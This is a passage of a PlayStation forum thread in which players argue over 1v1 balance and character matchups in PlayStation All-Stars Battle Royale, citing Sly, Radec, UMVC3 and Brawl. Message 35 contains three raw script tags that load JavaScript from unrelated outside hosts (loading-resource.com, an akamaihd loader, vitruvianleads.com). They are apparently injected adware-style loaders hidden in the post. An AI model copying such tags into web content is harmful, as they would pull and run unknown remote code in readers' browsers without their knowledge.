First Son
24 posts

Re: Is 1v1 really that broken?

Jan 17, 2013
use sly, i'll use whatever character you want. i'll even show you how to fight sly since you think it's broken. better yet, go to www.pastastadiumleagues.com and play good people so you can advance your game rather than blame the game
"Slipped right in"
Message 31 of 50 (139 Views)
First Son
24 posts

Jan 17, 2013
hmm...how can st get by the barrels? by playing the same he always does: jump lol play a lot of donkey kong and youll learn how to get by the barrels
"Slipped right in"
Message 32 of 50 (134 Views)
0 Likes
First Son
24 posts

Jan 17, 2013
@enano_javi ive played you online before and beat you with characters you should've beat me with. i even beat a kratos with parappa. my jak has beaten many raidens. i have videos of sir dan beating some of the most "op" characters in the game.
"Slipped right in"
Message 33 of 50 (130 Views)
Lombax Warrior
192 posts

[ Edited ]
Jan 17, 2013

@Tsukyome

Dude iv'e never ever used an OP character online in ranked matches, and if I did I did for fun never used them seriously cuz I know how OP they are. I main Nariko, Jak and now im playing Sackboy cuz I like him now after his nerf. You're also a really good liar, i've never ever played against you. The only games iv'e played in 1vs1 are against some in the group I am in the tournament and you're not even there and I don't even play seriously anymore. So if I fought against you it was on FFA or 2vs2, where I only play for fun.

PS. Aylas_Hero said in his forum to help him give his point out and let me understand as he said in his chat box that 1vs1 isn't a 100% completely broken, yet you come here to help him by mouthing off? Aylas_Hero was about to convince me until you came along and made like 4 useless and irrelevant posts. All I ever asked was for evidence that shows that even the worst matchup in this game in 1vs1 demonstrates that that the most OP character can lose. Otherwise evidence like that one of the Radec vs a Sly or a Jak vs another Sly shows au contraire that 1vs1 is completely unbalanced.

Message 34 of 50 (125 Views)
0 Likes
Gaming Beast
2167 posts

[ Edited ]
Jan 17, 2013

enano_javi wrote:

Many people here that say that it isn't broken are saying otherwise. They are saying that it "isn't" broken there are only "bad matchups", and that's exactly my point. If this game was actually balanced the most shi tty underused character could beat the best of the whole roster. Take for example UMVC3, Zero has no "bad matchups" as you say, he is an absolutely perfect character, he can do everything anyone can do in UMVC3, yet everyone in the entire roster is capable of beating him. When anyone in PSASBR is capable of beating anyone else, then this game is truly balanced and good for 1vs1.

Also for those saying that bad matchups exist in UMVC3 too, ur right they do exist, but when that situation is encountered in UMVC3 it is NEVER an impossible situation like that Radec vs Sly, in UMVC3 there is always a chance no matter what. When this game reaches that "chance" in a bad matchup, it will b truly playable in 1vs1.

What I really like bout this game is the 2vs2 and FFA's, its the only moment when this game is really fun.

If you seriously think UMVC3 isn't matchup based as well then I really don't even know what to tell you. The only thing that made certain characters even have a chance in that game was the assist system.

Remind me again, when in the history of MVC3 has Hsien-ko won a major tournament? The only guy who could even make her work at high level (Forget his name. Played Chris/Hsien-ko/Ammy) still couldn't beat high level players.

The entire metagame shifted to beat both Zero, then Morrigan/Doom (Which is why Dr. Strange is finally seeing game-time).

Every fighting game is matchup based, and while I hate to attack people's skill, if you can't see that then you haven't played a fighting game at a high level.

Also just for the record, Fonz MMed and beat a lot of high level metaknights with Ganon. He won about as many as he lost, and he did once win a tournament going only Ganon (It was MK banned though). Even then, we celebrated this impossible victory.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 35 of 50 (111 Views)
0 Likes
Wastelander
768 posts

[ Edited ]
Jan 17, 2013

anyone saying any char can beat any char in PASBR is lying  an expert SLy wont ever get beaten by radec ever  final. radec can do close to nothing to sly , radec has no useful kill confirm for  its lvl1 its preety much a 99-1 for sly winning unless the sly player is really bad  we wont ever loose since almost all radecs attacks go over it he cant even gain any AP to build a decent super before sly finishs him off

Message 36 of 50 (94 Views)
Survivor
2365 posts

Jan 17, 2013
In ANY game any character can beat any character.

No one said it was easy but it can be done. Did you see Apex where a B TIER CHARACTER beat the SS TIERS and won first place?

Message 37 of 50 (89 Views)
0 Likes
Lombax Warrior
192 posts

Jan 17, 2013

@Fromundaman

In UMVC3 I use the weirdest team EVER! And I still win, I am a High lvl player in marvel boy and let me tell you that in this game ur right the assist and x-factor system allows anyone to win, and by that I mean ANYONE. You surely don't know about marvel much cuz PR Balrog always tries to use some low tier characters and puts them in high lvl play. You surely didn't see the game after EVO of PR Balrog vs F.Champ, were F.Champ used the same team he always does with Phoenix and PR Balrog used Wolverine/Felicia/R.Raccoon he won, ok? A lot of times, he beat the best guy at marvel with that team. I sometimes use C.Viper, wich is a character that is sometimes really hard to zone in with and against a Hawkeye/Vergil/Doom, its almost impossible to ever get close to them but I did and I won anyways. Sure some games require skill, but not PSASBR when anyone spends 10min in practice with Kratos and u already know every big AP combo there is to him. In this game a very skilled Radec will never win against a Sly with the same skill. And you said it yourself when you talked about that Ganon vs MK, "He won about as many as he lost" and he won the tournament when MK was banned. You're proving my point about that balance in Brawl, it was only a balanced game after they banned MK. You said it yourself only after MK was banned did his Ganon skill prove to let him win a tournament. I never even brought Brawl into this conversation, it was used as an example for an impossible situation of a bad matchup when I never understood why Ganon is a horrible character when a Bowser vs MK seems like a much more horrible matchup.

Message 38 of 50 (84 Views)
0 Likes
Lombax Warrior
192 posts

Jan 17, 2013

pedro702 wrote:

anyone saying any char can beat any char in PASBR is lying  an expert SLy wont ever get beaten by radec ever  final. radec can do close to nothing to sly , radec has no useful kill confirm for  its lvl1 its preety much a 99-1 for sly winning unless the sly player is really bad  we wont ever loose since almost all radecs attacks go over it he cant even gain any AP to build a decent super before sly finishs him off

EXACTLY WHAT I MEAN ABOUT THIS GAME!!!!

Message 39 of 50 (83 Views)
0 Likes
Survivor
2365 posts

Jan 17, 2013
enano_javi, I'm not trying to be mean, but you are wrong.

Again, B tier beating SS tiers in ANY game proves something: and character can be beaten by another. You need to 1v1 more to understand this, or study how tier lists work more.
Message 40 of 50 (59 Views)
0 Likes